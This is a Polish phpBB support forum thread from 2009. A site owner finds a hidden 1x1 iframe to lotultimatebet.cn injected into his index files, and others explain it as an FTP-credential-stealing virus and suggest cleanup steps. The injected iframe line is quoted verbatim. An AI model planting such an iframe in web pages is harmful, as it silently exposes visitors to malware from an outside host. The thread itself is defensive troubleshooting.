Strona 1 z 2
Exploit na forum, co robić
: 14 kwietnia 2009, 09:02
autor: gracjan
Dziś rano po wejściu na forum zauważyłem problemy z grafiką, mega duże litery i nad logo pojawiły się takie rzeczy:
Kod: Zaznacz cały
[phpBB Debug] PHP Notice: in file /includes/session.php on line 942: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/session.php on line 942: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/session.php on line 942: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3545: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3547: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3548: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3549: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
Po wejściu na ftp i sprawdzeniu pliku index.php zauważyłem że na końcu kodu pojawiło się takie coś:
Kod: Zaznacz cały
<iframe src="http://lotultimatebet.cn/in.cgi?income60" width=1 height=1 style="visibility: hidden"></iframe>
Jak ładuje się strona to tak jakby ładowała się strona lotultimatebet.cn
Co robić??
Re: Forum jest chyba zhakowane, co robić
: 14 kwietnia 2009, 09:30
autor: ania07
Forum nie jest zhakowane, to jest wirus którego trzeba usunąć.
Re: Forum jest chyba zhakowane, co robić
: 14 kwietnia 2009, 09:36
autor: gracjan
Właśnie pousuwałem
Kod: Zaznacz cały
<iframe src="http://lotultimatebet.cn/in.cgi?income60" width=1 height=1 style="visibility: hidden"></iframe>
z każdego pliku index.* i chyba pomogło, jeśli trzeba coś jeszcze zrobić to dajcie znać
Re: Forum jest chyba zhakowane, co robić
: 14 kwietnia 2009, 09:58
autor: ania07
przeskanuj koniecznie system jakimś programem antywirusowym.
Re: Forum jest chyba zhakowane, co robić
: 14 kwietnia 2009, 10:35
autor: gracjan
Przeskanowałem dyski NODem i nic nie wykazało
Re: Forum jest chyba zhakowane, co robić
: 14 kwietnia 2009, 11:33
autor: ania07
No to gitarra
Re: Forum jest chyba zhakowane, co robić
: 14 kwietnia 2009, 12:53
autor: wiesieks
Dodatkowo radzę pozmieniać hasło dostępu do ftp, skoro kod dostał się do index.php prawdopodobnie zostało ono złamane - no chyba , że samemu go niechcący dodałeś
Re: Forum jest chyba zhakowane, co robić
: 14 kwietnia 2009, 14:24
autor: daroPL
we3b już kiedyś o tego rodzaju problemie pisał. Jest to wirus, który „dokleja” się do klienta FTP. Kradnie hasła i dodaje czasami do plików jakiś tekst/reklamę.
Re: Forum jest chyba zhakowane, co robić
: 14 kwietnia 2009, 16:22
autor: jaroslw
we3b pisze:Złośliwy kod na forum
Ostatnimi czasy wiele witryn (w tym także forów phpBB) zostało dotknięte wirusem, który
dokleja własny kod do plików. Pierwsze wersje wirusa współpracowały wyłącznie z
programem Total Commander. Nowsze generacje działają już z większością popularnych
klientów FTP. Wirus podsłuchuje ruch w sieci oraz przechwytuje hasła do kont FTP.
Następnie loguje się na konta i dokleja własny kod JavaScript. Najczęściej ląduje on w plikach
index.*.
W wypadku zainfekowania systemu należy go przeskanować dobrym antywirusem, a
następnie przejrzeć pliki forum i porównać z tymi z oficjalnej paczki phpBB. Najlepszą
ochroną przed wirusem jest nie zapisywanie haseł w programach do obsługi połączeń FTP.
Re: Forum jest chyba zhakowane, co robić
: 15 kwietnia 2009, 07:53
autor: gracjan
Kurde, pokasowałem te doklejone kody, po kilku godzinach znowu to samo :/ jak się mogę zabezpieczyć?? Pozmieniałem hasła, przeskanowałem kompa i nic, dalej to samo...
Re: Exploit na forum, co robić
: 15 kwietnia 2009, 11:20
autor: pit
Przeskanuj się czymś na "spyware/addware", wywal wszystko z documents and settings\gracjan\ustawienia lokalne\temp, i temporary internet files nie używaj IE.
Re: Exploit na forum, co robić
: 15 kwietnia 2009, 15:00
autor: jaroslw
Prawdopodobnie wirus dobrze się zamaskował. Mało informacji jest jeszcze na jego temat.
Z jakiego klienta FTP korzystasz?
Re: Exploit na forum, co robić
: 15 kwietnia 2009, 20:58
autor: matius71
najpierw usunąć wirka a potem zmienić hasło do ftp czy odwrotnie? Pytam bo jak sprytny wirek to jest chyba spora różnica?
Re: Exploit na forum, co robić
: 15 kwietnia 2009, 21:14
autor: jaroslw
Hasło i tak najprawdopodobniej zmieniasz przez panel administracji kontem hostingowym. Myślę, że tego już wirus nie przechwyci. Nie zapisuj nowego hasła w kliencie FTP do czasu usunięcia wirusa (na razie najlepiej w ogóle nie zapisuj w nim haseł ani loginów).
Re: Exploit na forum, co robić
: 15 kwietnia 2009, 23:17
autor: gracjan
Korzystam z Total Commandera, pousuwałem to gówno z plików index na serwerze, zmieniłem hasło, ale niektórym znajomym nadal podaje że w chwili wejścia na strone/forum atakuje ich trojan
na dole w pasku w chwili ładowania wyskakuje jeszcze nadal adres tamtej strony tak jakby się ładowało poprzez tamtą stronę, alias albo coś podobnego (nie znam się)
W każdym bądź razie po tych czynnościach forum działa bez zarzutów tylko niektórym pojawia się trojan i ładuje się poprzez tamtą stronę.
Jakby co to piszcie tu wasze problemy z tym badziewiem i wasze podpowiedzi co z tym robić...